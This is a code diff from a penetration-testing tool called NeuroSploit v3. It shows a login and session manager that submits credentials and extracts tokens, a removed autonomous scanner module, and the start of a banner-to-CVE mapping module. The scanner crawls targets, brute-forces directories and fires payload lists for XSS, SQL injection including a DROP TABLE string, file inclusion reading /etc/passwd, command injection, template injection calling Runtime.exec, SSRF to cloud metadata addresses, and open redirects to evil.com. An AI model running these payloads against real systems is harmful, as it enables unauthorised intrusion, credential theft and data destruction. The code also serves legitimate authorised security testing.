logger.info(f"Login success: {context_name} as {cred.username} ({cred.role})")
return True
ctx.state = "unauthenticated"
return False
async def _discover_login_forms(self):
"""Discover login forms by crawling common login paths."""
if not self.request_engine:
return
# Use recon data if available
target = ""
if self.recon and hasattr(self.recon, "target"):
target = self.recon.target
if not target:
return
login_paths = [
"/login", "/signin", "/sign-in", "/auth/login",
"/user/login", "/admin/login", "/api/auth/login",
"/account/login", "/wp-login.php", "/admin",
]
parsed = urlparse(target)
base = f"{parsed.scheme}://{parsed.netloc}"
for path in login_paths:
try:
url = f"{base}{path}"
result = await self.request_engine.request(url, method="GET")
if result and result.status == 200 and result.body:
forms = self.detect_login_forms(result.body, url)
if forms:
logger.debug(f"Found {len(forms)} login form(s) at {url}")
return # Found forms, stop searching
except Exception:
continue
async def _attempt_login(self, form: LoginForm, cred: Credentials, ctx: SessionContext) -> bool:
"""Attempt login with a specific form and credential."""
try:
# Build form data
data = {}
# Add hidden fields first
data.update(form.extra_fields)
# Refresh CSRF token if needed
if form.csrf_field:
fresh_csrf = await self._refresh_csrf(form)
if fresh_csrf:
data[form.csrf_field] = fresh_csrf
elif form.csrf_value:
data[form.csrf_field] = form.csrf_value
# Add credentials
data[form.username_field] = cred.username
data[form.password_field] = cred.password
# Submit form
result = await self.request_engine.request(
form.url,
method=form.method,
data=data,
allow_redirects=True,
)
if not result:
return False
# Check for login success
success = self._detect_login_success(
result.body, result.status, result.headers
)
if success:
# Extract tokens and cookies
self._extract_session_data(result, ctx)
return True
return False
except Exception as e:
logger.debug(f"Login attempt failed: {e}")
return False
async def _refresh_csrf(self, form: LoginForm) -> Optional[str]:
"""Fetch fresh CSRF token from the login page."""
try:
# GET the form page to get a fresh token
page_url = form.url.replace(urlparse(form.url).path, "") + urlparse(form.url).path
result = await self.request_engine.request(page_url, method="GET")
if result and result.body:
_, csrf_value = self._find_csrf_token(result.body)
return csrf_value
except Exception:
pass
return None
def _detect_login_success(self, body: str, status: int, headers: Dict) -> bool:
"""Detect if login was successful."""
body_lower = (body or "").lower()
# Check for redirect to authenticated area
if status in (301, 302, 303, 307):
location = headers.get("Location", headers.get("location", ""))
if any(kw in location.lower() for kw in ["dashboard", "home", "profile", "admin"]):
return True
# Check for Set-Cookie (session creation)
has_session_cookie = any(
"set-cookie" in k.lower() for k in headers
)
# Check for success indicators in body
success_count = sum(1 for kw in self.SUCCESS_INDICATORS if kw in body_lower)
failure_count = sum(1 for kw in self.FAILURE_INDICATORS if kw in body_lower)
# Success if: session cookie + success indicators and no failure indicators
if has_session_cookie and success_count > 0 and failure_count == 0:
return True
# Success if: 200 OK + strong success indicators + no failure
if status == 200 and success_count >= 2 and failure_count == 0:
return True
return False
def _extract_session_data(self, result, ctx: SessionContext):
"""Extract tokens and cookies from a successful login response."""
# Extract cookies from Set-Cookie headers
for key, value in result.headers.items():
if key.lower() == "set-cookie":
cookie_parts = value.split(";")[0].split("=", 1)
if len(cookie_parts) == 2:
ctx.cookies[cookie_parts[0].strip()] = cookie_parts[1].strip()
# Extract tokens from response body (JSON)
body = result.body or ""
token_patterns = [
(r'"(?:access_token|token|jwt|bearer|id_token)"\s*:\s*"([^"]+)"', "bearer"),
(r'"(?:api_key|apikey|api-key)"\s*:\s*"([^"]+)"', "api_key"),
(r'"(?:refresh_token)"\s*:\s*"([^"]+)"', "refresh"),
]
for pattern, token_type in token_patterns:
match = re.search(pattern, body, re.I)
if match:
ctx.tokens[token_type] = match.group(1)
# Build auth headers
if "bearer" in ctx.tokens:
ctx.headers["Authorization"] = f"Bearer {ctx.tokens['bearer']}"
elif "api_key" in ctx.tokens:
ctx.headers["X-API-Key"] = ctx.tokens["api_key"]
# --- Session Management ----------------------------------------------
def detect_session_expiry(self, body: str, status: int) -> bool:
"""Check if a response indicates session expiry."""
if status in (401, 403):
return True
body_lower = (body or "").lower()
return any(kw in body_lower for kw in self.EXPIRY_INDICATORS)
async def refresh(self, context_name: Optional[str] = None) -> bool:
"""Refresh an expired session by re-authenticating.
If context_name is None, refresh all expired sessions.
"""
contexts_to_refresh = []
if context_name:
ctx = self.contexts.get(context_name)
if ctx and ctx.state == "expired":
contexts_to_refresh.append(context_name)
else:
for name, ctx in self.contexts.items():
if ctx.state == "expired":
contexts_to_refresh.append(name)
results = []
for name in contexts_to_refresh:
ctx = self.contexts[name]
ctx.state = "unauthenticated"
ctx.cookies.clear()
ctx.tokens.clear()
ctx.headers.clear()
success = await self.authenticate(name)
results.append(success)
return all(results) if results else False
def check_and_mark_expiry(self, context_name: str, body: str, status: int) -> bool:
"""Check response for expiry and mark context if expired.
Returns True if session was detected as expired.
"""
ctx = self.contexts.get(context_name)
if not ctx or ctx.state != "authenticated":
return False
if self.detect_session_expiry(body, status):
ctx.state = "expired"
logger.info(f"Session expired for {context_name}")
return True
# Check time-based expiry
if ctx.login_time and (time.time() - ctx.login_time) > ctx.session_duration:
ctx.state = "expired"
logger.info(f"Session timeout for {context_name}")
return True
return False
# --- Request Integration ---------------------------------------------
def get_context(self, context_name: str) -> Optional[SessionContext]:
"""Get a session context by name."""
return self.contexts.get(context_name)
def get_request_kwargs(self, context_name: str) -> Dict:
"""Get headers and cookies for requests as a context.
Returns dict with 'headers' and 'cookies' ready for request_engine.
"""
ctx = self.contexts.get(context_name)
if not ctx or ctx.state != "authenticated":
return {"headers": {}, "cookies": {}}
return {
"headers": dict(ctx.headers),
"cookies": dict(ctx.cookies),
}
def is_authenticated(self, context_name: str) -> bool:
"""Check if a context is currently authenticated."""
ctx = self.contexts.get(context_name)
return ctx is not None and ctx.state == "authenticated"
def get_auth_summary(self) -> Dict:
"""Get summary of authentication state for reporting."""
return {
"contexts": {
name: {
"state": ctx.state,
"role": ctx.role,
"credential": ctx.credential.username if ctx.credential else None,
"has_tokens": bool(ctx.tokens),
"has_cookies": bool(ctx.cookies),
}
for name, ctx in self.contexts.items()
},
"login_forms_found": len(self._login_forms),
"login_attempts": self._login_attempts,
"successful_logins": self._successful_logins,
"credentials_available": {
role: len(creds)
for role, creds in self._credentials.items()
},
}
File diff suppressed because it is too large Load Diff
@@ -1,951 +0,0 @@
"""
NeuroSploit v3 - Autonomous Scanner
This module performs autonomous endpoint discovery and vulnerability testing
when reconnaissance finds little or nothing. It actively:
1. Bruteforces directories using ffuf/gobuster/feroxbuster
2. Crawls the site aggressively
3. Tests common vulnerable endpoints
4. Generates test cases based on common patterns
5. Adapts based on what it discovers
GLOBAL AUTHORIZATION:
This tool is designed for authorized penetration testing only.
All tests are performed with explicit authorization from the target owner.
"""
import asyncio
import aiohttp
import subprocess
import json
import re
import os
from typing import Dict, List, Any, Optional, Callable
from urllib.parse import urljoin, urlparse, parse_qs, urlencode
from dataclasses import dataclass, field
from datetime import datetime
@dataclass
class DiscoveredEndpoint:
"""Represents a discovered endpoint"""
url: str
method: str = "GET"
status_code: int = 0
content_type: str = ""
content_length: int = 0
parameters: List[str] = field(default_factory=list)
source: str = "discovery" # How it was discovered
interesting: bool = False # Potentially vulnerable
@dataclass
class TestResult:
"""Result of a vulnerability test"""
endpoint: str
vuln_type: str
payload: str
is_vulnerable: bool
confidence: float
evidence: str
request: Dict
response: Dict
class AutonomousScanner:
"""
Autonomous vulnerability scanner that actively discovers and tests endpoints.
Works independently of reconnaissance - if recon fails, this scanner will:
1. Crawl the target site
2. Discover directories via bruteforce
3. Find parameters and endpoints
4. Test all discovered points for vulnerabilities
"""
# Common vulnerable endpoints to always test
COMMON_ENDPOINTS = [
# Login/Auth
"/login", "/signin", "/auth", "/admin", "/admin/login", "/wp-admin",
"/user/login", "/account/login", "/administrator",
# API endpoints
"/api", "/api/v1", "/api/v2", "/api/users", "/api/user",
"/api/login", "/api/auth", "/api/token", "/graphql",
# File operations
"/upload", "/download", "/file", "/files", "/documents",
"/images", "/media", "/assets", "/static",
# Common vulnerable paths
"/search", "/query", "/find", "/lookup",
"/include", "/page", "/view", "/show", "/display",
"/read", "/load", "/fetch", "/get",
# Debug/Dev
"/debug", "/test", "/dev", "/staging",
"/phpinfo.php", "/.env", "/.git/config",
"/server-status", "/server-info",
# CMS specific
"/wp-content", "/wp-includes", "/xmlrpc.php",
"/joomla", "/drupal", "/magento",
# Config files
"/config.php", "/configuration.php", "/settings.php",
"/web.config", "/config.xml", "/config.json",
# Backup files
"/backup", "/backup.sql", "/dump.sql",
"/db.sql", "/database.sql",
]
# Common parameters to test
COMMON_PARAMS = [
"id", "page", "file", "path", "url", "redirect", "next",
"query", "search", "q", "s", "keyword", "term",
"user", "username", "name", "email", "login",
"cat", "category", "item", "product", "article",
"action", "cmd", "command", "exec", "run",
"template", "tpl", "theme", "lang", "language",
"sort", "order", "orderby", "filter",
"callback", "jsonp", "format", "type",
"debug", "test", "demo", "preview",
]
# XSS test payloads
XSS_PAYLOADS = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"'\"><script>alert('XSS')</script>",
"<svg onload=alert('XSS')>",
"javascript:alert('XSS')",
"<body onload=alert('XSS')>",
"'-alert('XSS')-'",
"\"><img src=x onerror=alert('XSS')>",
]
# SQLi test payloads
SQLI_PAYLOADS = [
"'", "\"", "' OR '1'='1", "\" OR \"1\"=\"1",
"' OR 1=1--", "\" OR 1=1--", "1' AND '1'='1",
"'; DROP TABLE users--", "1; SELECT * FROM users",
"' UNION SELECT NULL--", "' UNION SELECT 1,2,3--",
"1' AND SLEEP(5)--", "1'; WAITFOR DELAY '0:0:5'--",
"admin'--", "admin' #", "admin'/*",
]
# LFI test payloads
LFI_PAYLOADS = [
"../../../etc/passwd",
"....//....//....//etc/passwd",
"/etc/passwd",
"..\\..\\..\\windows\\win.ini",
"file:///etc/passwd",
"/proc/self/environ",
"php://filter/convert.base64-encode/resource=index.php",
"php://input",
"expect://id",
"data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==",
]
# Command injection payloads
CMDI_PAYLOADS = [
"; id", "| id", "|| id", "&& id",
"; whoami", "| whoami", "|| whoami",
"`id`", "$(id)", "${id}",
"; cat /etc/passwd", "| cat /etc/passwd",
"; ping -c 3 127.0.0.1", "| ping -c 3 127.0.0.1",
]
# SSTI payloads
SSTI_PAYLOADS = [
"{{7*7}}", "${7*7}", "<%= 7*7 %>",
"{{config}}", "{{self}}", "{{request}}",
"${T(java.lang.Runtime).getRuntime().exec('id')}",
"{{''.__class__.__mro__[2].__subclasses__()}}",
"@(1+2)", "#{7*7}",
]
# SSRF payloads
SSRF_PAYLOADS = [
"http://localhost", "http://127.0.0.1",
"http://[::1]", "http://0.0.0.0",
"http://169.254.169.254/latest/meta-data/",
"http://metadata.google.internal/",
"file:///etc/passwd",
"dict://localhost:11211/",
"gopher://localhost:6379/_",
]
def __init__(
self,
scan_id: str,
log_callback: Optional[Callable] = None,
timeout: int = 15,
max_depth: int = 3
):
self.scan_id = scan_id
self.log_callback = log_callback or self._default_log
self.timeout = timeout
self.max_depth = max_depth
self.discovered_endpoints: List[DiscoveredEndpoint] = []
self.tested_urls: set = set()
self.vulnerabilities: List[TestResult] = []
self.session: Optional[aiohttp.ClientSession] = None
self.wordlist_path = "/opt/wordlists/common.txt"
async def _default_log(self, level: str, message: str):
"""Default logging"""
print(f"[{level.upper()}] {message}")
async def log(self, level: str, message: str):
"""Log a message"""
if asyncio.iscoroutinefunction(self.log_callback):
await self.log_callback(level, message)
else:
self.log_callback(level, message)
async def __aenter__(self):
connector = aiohttp.TCPConnector(ssl=False, limit=50)
timeout = aiohttp.ClientTimeout(total=self.timeout)
self.session = aiohttp.ClientSession(connector=connector, timeout=timeout)
return self
async def __aexit__(self, *args):
if self.session:
await self.session.close()
async def run_autonomous_scan(
self,
target_url: str,
recon_data: Optional[Dict] = None
) -> Dict[str, Any]:
"""
Run a fully autonomous scan on the target.
This will:
1. Spider/crawl the target
2. Discover directories
3. Find parameters
4. Test all discovered endpoints
Returns comprehensive results even if recon found nothing.
"""
await self.log("info", f"Starting autonomous scan on: {target_url}")
await self.log("info", "This is an authorized penetration test.")
parsed = urlparse(target_url)
base_url = f"{parsed.scheme}://{parsed.netloc}"
results = {
"target": target_url,
"started_at": datetime.utcnow().isoformat(),
"endpoints": [],
"vulnerabilities": [],
"parameters_found": [],
"directories_found": [],
"technologies": []
}
# Phase 1: Initial probe
await self.log("info", "Phase 1: Initial target probe...")
initial_info = await self._probe_target(target_url)
results["technologies"] = initial_info.get("technologies", [])
await self.log("info", f" Technologies detected: {', '.join(results['technologies']) or 'None'}")
# Phase 2: Directory discovery
await self.log("info", "Phase 2: Directory discovery...")
directories = await self._discover_directories(base_url)
results["directories_found"] = directories
await self.log("info", f" Found {len(directories)} directories")
# Phase 3: Crawl the site
await self.log("info", "Phase 3: Crawling site for links and forms...")
crawled = await self._crawl_site(target_url)
await self.log("info", f" Crawled {len(crawled)} pages")
# Phase 4: Discover parameters
await self.log("info", "Phase 4: Parameter discovery...")
parameters = await self._discover_parameters(target_url)
results["parameters_found"] = parameters
await self.log("info", f" Found {len(parameters)} parameters")
# Phase 5: Generate test endpoints
await self.log("info", "Phase 5: Generating test endpoints...")
test_endpoints = self._generate_test_endpoints(target_url, parameters, directories)
await self.log("info", f" Generated {len(test_endpoints)} test endpoints")
# Merge with any recon data
if recon_data:
for url in recon_data.get("urls", []):
self._add_endpoint(url, source="recon")
for endpoint in recon_data.get("endpoints", []):
if isinstance(endpoint, dict):
self._add_endpoint(endpoint.get("url", ""), source="recon")
# Add test endpoints
for ep in test_endpoints:
self._add_endpoint(ep["url"], source=ep.get("source", "generated"))
results["endpoints"] = [
{
"url": ep.url,
"method": ep.method,
"status": ep.status_code,
"source": ep.source,
"parameters": ep.parameters
}
for ep in self.discovered_endpoints
]
# Phase 6: Vulnerability testing
await self.log("info", f"Phase 6: Testing {len(self.discovered_endpoints)} endpoints for vulnerabilities...")
for i, endpoint in enumerate(self.discovered_endpoints):
if endpoint.url in self.tested_urls:
continue
self.tested_urls.add(endpoint.url)
await self.log("debug", f" [{i+1}/{len(self.discovered_endpoints)}] Testing: {endpoint.url[:80]}...")
# Test each vulnerability type
vulns = await self._test_endpoint_all_vulns(endpoint)
self.vulnerabilities.extend(vulns)
# Log findings immediately
for vuln in vulns:
await self.log("warning", f" FOUND: {vuln.vuln_type} on {endpoint.url[:60]} (confidence: {vuln.confidence:.0%})")
results["vulnerabilities"] = [
{
"type": v.vuln_type,
"endpoint": v.endpoint,
"payload": v.payload,
"confidence": v.confidence,
"evidence": v.evidence[:500]
}
for v in self.vulnerabilities
]
results["completed_at"] = datetime.utcnow().isoformat()
results["summary"] = {
"endpoints_tested": len(self.tested_urls),
"vulnerabilities_found": len(self.vulnerabilities),
"critical": len([v for v in self.vulnerabilities if v.confidence >= 0.9]),
"high": len([v for v in self.vulnerabilities if 0.7 <= v.confidence < 0.9]),
"medium": len([v for v in self.vulnerabilities if 0.5 <= v.confidence < 0.7]),
}
await self.log("info", f"Autonomous scan complete. Found {len(self.vulnerabilities)} potential vulnerabilities.")
return results
def _add_endpoint(self, url: str, source: str = "discovery"):
"""Add an endpoint if not already discovered"""
if not url:
return
for ep in self.discovered_endpoints:
if ep.url == url:
return
self.discovered_endpoints.append(DiscoveredEndpoint(url=url, source=source))
async def _probe_target(self, url: str) -> Dict:
"""Initial probe to gather info about the target"""
info = {"technologies": [], "headers": {}, "server": ""}
try:
async with self.session.get(url, headers={"User-Agent": "NeuroSploit/3.0"}) as resp:
info["headers"] = dict(resp.headers)
info["status"] = resp.status
body = await resp.text()
# Detect technologies
if "wp-content" in body or "WordPress" in body:
info["technologies"].append("WordPress")
if "Joomla" in body:
info["technologies"].append("Joomla")
if "Drupal" in body:
info["technologies"].append("Drupal")
if "react" in body.lower() or "React" in body:
info["technologies"].append("React")
if "angular" in body.lower():
info["technologies"].append("Angular")
if "vue" in body.lower():
info["technologies"].append("Vue.js")
if "php" in body.lower() or ".php" in body:
info["technologies"].append("PHP")
if "asp.net" in body.lower() or "aspx" in body.lower():
info["technologies"].append("ASP.NET")
if "java" in body.lower() or "jsp" in body.lower():
info["technologies"].append("Java")
# Server header
info["server"] = resp.headers.get("Server", "")
if info["server"]:
info["technologies"].append(f"Server: {info['server']}")
# X-Powered-By
powered_by = resp.headers.get("X-Powered-By", "")
if powered_by:
info["technologies"].append(f"Powered by: {powered_by}")
except Exception as e:
await self.log("debug", f"Probe error: {str(e)}")
return info
async def _discover_directories(self, base_url: str) -> List[str]:
"""Discover directories using built-in wordlist and common paths"""
found_dirs = []
# First try common endpoints
await self.log("debug", " Testing common endpoints...")
tasks = []
for endpoint in self.COMMON_ENDPOINTS:
url = urljoin(base_url, endpoint)
tasks.append(self._check_url_exists(url))
results = await asyncio.gather(*tasks, return_exceptions=True)
for endpoint, result in zip(self.COMMON_ENDPOINTS, results):
if isinstance(result, dict) and result.get("exists"):
found_dirs.append(endpoint)
self._add_endpoint(urljoin(base_url, endpoint), source="directory_bruteforce")
await self.log("debug", f" Found: {endpoint} [{result.get('status')}]")
# Try using ffuf if available
if await self._tool_available("ffuf"):
await self.log("debug", " Running ffuf directory scan...")
ffuf_results = await self._run_ffuf(base_url)
for path in ffuf_results:
if path not in found_dirs:
found_dirs.append(path)
self._add_endpoint(urljoin(base_url, path), source="ffuf")
return found_dirs
async def _check_url_exists(self, url: str) -> Dict:
"""Check if a URL exists (returns 2xx or 3xx)"""
try:
async with self.session.get(
url,
headers={"User-Agent": "NeuroSploit/3.0"},
allow_redirects=False
) as resp:
exists = resp.status < 400 and resp.status != 404
return {"exists": exists, "status": resp.status}
except:
return {"exists": False, "status": 0}
async def _tool_available(self, tool_name: str) -> bool:
"""Check if a tool is available"""
try:
result = subprocess.run(
["which", tool_name],
capture_output=True,
timeout=5
)
return result.returncode == 0
except:
return False
async def _run_ffuf(self, base_url: str) -> List[str]:
"""Run ffuf for directory discovery"""
found = []
try:
wordlist = self.wordlist_path if os.path.exists(self.wordlist_path) else None
if not wordlist:
return found
cmd = [
"ffuf",
"-u", f"{base_url}/FUZZ",
"-w", wordlist,
"-mc", "200,201,301,302,307,401,403,500",
"-t", "20",
"-timeout", "10",
"-o", "/tmp/ffuf_out.json",
"-of", "json",
"-s" # Silent
]
process = await asyncio.create_subprocess_exec(
*cmd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
await asyncio.wait_for(process.wait(), timeout=120)
if os.path.exists("/tmp/ffuf_out.json"):
with open("/tmp/ffuf_out.json", "r") as f:
data = json.load(f)
for result in data.get("results", []):
path = "/" + result.get("input", {}).get("FUZZ", "")
if path and path != "/":
found.append(path)
os.remove("/tmp/ffuf_out.json")
except Exception as e:
await self.log("debug", f"ffuf error: {str(e)}")
return found
async def _crawl_site(self, url: str) -> List[str]:
"""Crawl the site to find links, forms, and endpoints"""
crawled = []
to_crawl = [url]
visited = set()
depth = 0
parsed_base = urlparse(url)
base_domain = parsed_base.netloc
while to_crawl and depth < self.max_depth:
current_batch = to_crawl[:20] # Crawl 20 at a time
to_crawl = to_crawl[20:]
tasks = []
for page_url in current_batch:
if page_url in visited:
continue
visited.add(page_url)
tasks.append(self._extract_links(page_url, base_domain))
results = await asyncio.gather(*tasks, return_exceptions=True)
for result in results:
if isinstance(result, list):
crawled.extend(result)
for link in result:
if link not in visited and link not in to_crawl:
to_crawl.append(link)
depth += 1
return list(set(crawled))
async def _extract_links(self, url: str, base_domain: str) -> List[str]:
"""Extract links and forms from a page"""
links = []
try:
async with self.session.get(
url,
headers={"User-Agent": "NeuroSploit/3.0"}
) as resp:
body = await resp.text()
# Extract href links
href_pattern = r'href=["\']([^"\']+)["\']'
for match in re.finditer(href_pattern, body, re.IGNORECASE):
link = match.group(1)
full_url = urljoin(url, link)
parsed = urlparse(full_url)
if parsed.netloc == base_domain:
links.append(full_url)
self._add_endpoint(full_url, source="crawler")
# Extract src attributes
src_pattern = r'src=["\']([^"\']+)["\']'
for match in re.finditer(src_pattern, body, re.IGNORECASE):
link = match.group(1)
full_url = urljoin(url, link)
if ".js" in full_url or ".php" in full_url:
self._add_endpoint(full_url, source="crawler")
# Extract form actions
form_pattern = r'<form[^>]*action=["\']([^"\']*)["\'][^>]*>'
for match in re.finditer(form_pattern, body, re.IGNORECASE):
action = match.group(1) or url
full_url = urljoin(url, action)
self._add_endpoint(full_url, source="form")
# Extract URLs from JavaScript
js_url_pattern = r'["\']/(api|v1|v2|user|admin|login|auth)[^"\']*["\']'
for match in re.finditer(js_url_pattern, body):
path = match.group(0).strip("\"'")
full_url = urljoin(url, path)
self._add_endpoint(full_url, source="javascript")
except Exception as e:
pass
return links
async def _discover_parameters(self, url: str) -> List[str]:
"""Discover parameters through various methods"""
found_params = set()
# Extract from URL
parsed = urlparse(url)
if parsed.query:
params = parse_qs(parsed.query)
found_params.update(params.keys())
# Try common parameters
await self.log("debug", " Testing common parameters...")
base_url = url.split("?")[0]
for param in self.COMMON_PARAMS[:20]: # Test top 20
test_url = f"{base_url}?{param}=test123"
try:
async with self.session.get(
test_url,
headers={"User-Agent": "NeuroSploit/3.0"}
) as resp:
body = await resp.text()
# Check if parameter is reflected or changes response
if "test123" in body or resp.status == 200:
found_params.add(param)
except:
pass
# Try arjun if available
if await self._tool_available("arjun"):
await self.log("debug", " Running arjun parameter discovery...")
try:
process = await asyncio.create_subprocess_exec(
"arjun", "-u", url, "-o", "/tmp/arjun_out.json", "-q",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
await asyncio.wait_for(process.wait(), timeout=60)
if os.path.exists("/tmp/arjun_out.json"):
with open("/tmp/arjun_out.json", "r") as f:
data = json.load(f)
for url_data in data.values():
if isinstance(url_data, list):
found_params.update(url_data)
os.remove("/tmp/arjun_out.json")
except:
pass
return list(found_params)
def _generate_test_endpoints(
self,
target_url: str,
parameters: List[str],
directories: List[str]
) -> List[Dict]:
"""Generate test endpoints based on discovered information"""
endpoints = []
parsed = urlparse(target_url)
base_url = f"{parsed.scheme}://{parsed.netloc}"
# Generate endpoint + parameter combinations
for directory in directories:
full_url = urljoin(base_url, directory)
endpoints.append({"url": full_url, "source": "directory"})
# Add with common parameters
for param in self.COMMON_PARAMS[:10]:
test_url = f"{full_url}?{param}=FUZZ"
endpoints.append({"url": test_url, "source": "param_injection"})
# Target URL with discovered parameters
for param in parameters:
test_url = f"{target_url.split('?')[0]}?{param}=FUZZ"
endpoints.append({"url": test_url, "source": "discovered_param"})
# Multi-param combinations
if len(parameters) >= 2:
param_string = "&".join([f"{p}=FUZZ" for p in parameters[:5]])
test_url = f"{target_url.split('?')[0]}?{param_string}"
endpoints.append({"url": test_url, "source": "multi_param"})
return endpoints
async def _test_endpoint_all_vulns(self, endpoint: DiscoveredEndpoint) -> List[TestResult]:
"""Test an endpoint for all vulnerability types"""
results = []
url = endpoint.url
# Test XSS
xss_result = await self._test_xss(url)
if xss_result:
results.append(xss_result)
# Test SQLi
sqli_result = await self._test_sqli(url)
if sqli_result:
results.append(sqli_result)
# Test LFI
lfi_result = await self._test_lfi(url)
if lfi_result:
results.append(lfi_result)
# Test Command Injection
cmdi_result = await self._test_cmdi(url)
if cmdi_result:
results.append(cmdi_result)
# Test SSTI
ssti_result = await self._test_ssti(url)
if ssti_result:
results.append(ssti_result)
# Test Open Redirect
redirect_result = await self._test_open_redirect(url)
if redirect_result:
results.append(redirect_result)
return results
async def _inject_payload(self, url: str, payload: str) -> Optional[Dict]:
"""Inject a payload into URL parameters"""
try:
if "?" in url:
base, query = url.split("?", 1)
params = {}
for p in query.split("&"):
if "=" in p:
k, v = p.split("=", 1)
params[k] = payload
else:
params[p] = payload
test_url = base + "?" + urlencode(params)
else:
# Add payload as common parameter
test_url = f"{url}?id={payload}&q={payload}"
async with self.session.get(
test_url,
headers={"User-Agent": "NeuroSploit/3.0"},
allow_redirects=False
) as resp:
body = await resp.text()
return {
"url": test_url,
"status": resp.status,
"headers": dict(resp.headers),
"body": body[:5000],
"payload": payload
}
except:
return None
async def _test_xss(self, url: str) -> Optional[TestResult]:
"""Test for XSS vulnerabilities"""
for payload in self.XSS_PAYLOADS:
result = await self._inject_payload(url, payload)
if not result:
continue
# Check if payload is reflected
if payload in result["body"]:
return TestResult(
endpoint=url,
vuln_type="xss_reflected",
payload=payload,
is_vulnerable=True,
confidence=0.8,
evidence=f"Payload reflected in response: {payload}",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
# Check for unescaped reflection
if payload.replace("<", "&lt;").replace(">", "&gt;") not in result["body"]:
if any(tag in result["body"] for tag in ["<script", "<img", "<svg", "onerror", "onload"]):
return TestResult(
endpoint=url,
vuln_type="xss_reflected",
payload=payload,
is_vulnerable=True,
confidence=0.6,
evidence="HTML tags detected in response",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
return None
async def _test_sqli(self, url: str) -> Optional[TestResult]:
"""Test for SQL injection vulnerabilities"""
error_patterns = [
"sql syntax", "mysql", "sqlite", "postgresql", "oracle",
"syntax error", "unclosed quotation", "unterminated string",
"query failed", "database error", "odbc", "jdbc",
"microsoft sql", "pg_query", "mysql_fetch", "ora-",
"quoted string not properly terminated"
]
for payload in self.SQLI_PAYLOADS:
result = await self._inject_payload(url, payload)
if not result:
continue
body_lower = result["body"].lower()
# Check for SQL error messages
for pattern in error_patterns:
if pattern in body_lower:
return TestResult(
endpoint=url,
vuln_type="sqli_error",
payload=payload,
is_vulnerable=True,
confidence=0.9,
evidence=f"SQL error pattern found: {pattern}",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
# Test for time-based blind SQLi
time_payloads = ["1' AND SLEEP(5)--", "1'; WAITFOR DELAY '0:0:5'--"]
for payload in time_payloads:
import time
start = time.time()
result = await self._inject_payload(url, payload)
elapsed = time.time() - start
if elapsed >= 4.5: # Account for network latency
return TestResult(
endpoint=url,
vuln_type="sqli_blind_time",
payload=payload,
is_vulnerable=True,
confidence=0.7,
evidence=f"Response delayed by {elapsed:.1f}s (expected 5s)",
request={"url": url, "method": "GET"},
response={"status": 0, "body_preview": "TIMEOUT"}
)
return None
async def _test_lfi(self, url: str) -> Optional[TestResult]:
"""Test for Local File Inclusion vulnerabilities"""
lfi_indicators = [
"root:x:", "root:*:", "[boot loader]", "[operating systems]",
"bin/bash", "/bin/sh", "daemon:", "www-data:",
"[extensions]", "[fonts]", "extension=",
]
for payload in self.LFI_PAYLOADS:
result = await self._inject_payload(url, payload)
if not result:
continue
body_lower = result["body"].lower()
for indicator in lfi_indicators:
if indicator.lower() in body_lower:
return TestResult(
endpoint=url,
vuln_type="lfi",
payload=payload,
is_vulnerable=True,
confidence=0.95,
evidence=f"File content indicator found: {indicator}",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
return None
async def _test_cmdi(self, url: str) -> Optional[TestResult]:
"""Test for Command Injection vulnerabilities"""
cmdi_indicators = [
"uid=", "gid=", "groups=", "root:x:",
"linux", "darwin", "bin/", "/usr/",
"volume serial number", "directory of",
]
for payload in self.CMDI_PAYLOADS:
result = await self._inject_payload(url, payload)
if not result:
continue
body_lower = result["body"].lower()
for indicator in cmdi_indicators:
if indicator.lower() in body_lower:
return TestResult(
endpoint=url,
vuln_type="command_injection",
payload=payload,
is_vulnerable=True,
confidence=0.9,
evidence=f"Command output indicator found: {indicator}",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
return None
async def _test_ssti(self, url: str) -> Optional[TestResult]:
"""Test for Server-Side Template Injection"""
# Mathematical expressions that should evaluate
math_payloads = [
("{{7*7}}", "49"),
("${7*7}", "49"),
("<%= 7*7 %>", "49"),
("{{7*'7'}}", "7777777"),
("#{7*7}", "49"),
]
for payload, expected in math_payloads:
result = await self._inject_payload(url, payload)
if not result:
continue
if expected in result["body"] and payload not in result["body"]:
return TestResult(
endpoint=url,
vuln_type="ssti",
payload=payload,
is_vulnerable=True,
confidence=0.85,
evidence=f"Template expression evaluated: {payload} -> {expected}",
request={"url": result["url"], "method": "GET"},
response={"status": result["status"], "body_preview": result["body"][:500]}
)
return None
async def _test_open_redirect(self, url: str) -> Optional[TestResult]:
"""Test for Open Redirect vulnerabilities"""
redirect_payloads = [
"https://evil.com",
"//evil.com",
"////evil.com",
"https:evil.com",
"/\\evil.com",
"///evil.com/%2f..",
]
redirect_params = ["url", "redirect", "next", "return", "goto", "dest", "rurl", "target"]
parsed = urlparse(url)
base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
for param in redirect_params:
for payload in redirect_payloads:
test_url = f"{base_url}?{param}={payload}"
try:
async with self.session.get(
test_url,
headers={"User-Agent": "NeuroSploit/3.0"},
allow_redirects=False
) as resp:
if resp.status in [301, 302, 303, 307, 308]:
location = resp.headers.get("Location", "")
if "evil.com" in location:
return TestResult(
endpoint=url,
vuln_type="open_redirect",
payload=payload,
is_vulnerable=True,
confidence=0.85,
evidence=f"Redirects to external domain: {location}",
request={"url": test_url, "method": "GET"},
response={"status": resp.status, "location": location}
)
except:
pass
return None
@@ -1,686 +0,0 @@
"""
Banner / version-to-vulnerability mapping module.
Analyses software version strings extracted during reconnaissance and maps
them to known CVEs, end-of-life status, and security advisories. Every CVE
entry in KNOWN_VULNS references a real, publicly-documented vulnerability.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
# ---------------------------------------------------------------------------
# Data classes
# ---------------------------------------------------------------------------
@dataclass
class BannerFinding:
"""A single vulnerability or advisory derived from a version string."""
software: str
version: str
cve: str
vuln_type: str
severity: str # critical | high | medium | low
description: str
source: str # e.g. "banner_analyzer:known_vulns"
# ---------------------------------------------------------------------------
# Severity ordering (lower index == more severe)
